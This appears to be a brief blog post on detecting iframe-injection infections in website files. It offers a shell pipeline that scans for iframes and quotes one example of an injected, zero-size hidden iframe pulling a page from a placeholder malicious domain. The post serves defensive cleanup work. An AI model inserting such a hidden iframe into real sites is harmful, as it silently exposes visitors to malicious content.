Lets face it, there are is lot of virii going around these days. No longer are the days of mass .exe emailing ( though they still go around ). Now you have websites being hijacked and used as malcious carriers of the virus.

Finding the infection

The scripts here only detect possible infections, this needs to be a hand on fix to ensure you don't break anything. It is also worth mentioning that iframes do have legit reasons for existance and are used frequently in the industry. Just because this detects a file with an iframe does not mean it is infected. This script does a search through the website for all 'files' that are not in the second list 'not binaries' and looks inside for iframes.

find . -type f | egrep -iv '(..png|..jpg|_binary files_|..gif)' | awk \
 '{ print "grep -li iframe " $1 }'|sh

The result will be a list of files containing iframes.

index.html
services.html
bloglinks.html
site.js

$cat index.html | grep iframe
<iframe src=http://infected.domain.tld/badfile.htm width=0 height=0></iframe>

This is a simple example, most are much uglier and encode their functions. For cleaning solutions, it depends on the type of strain. Most of the strains will require individual cleaning solutions that scripts cannot provide.

Comments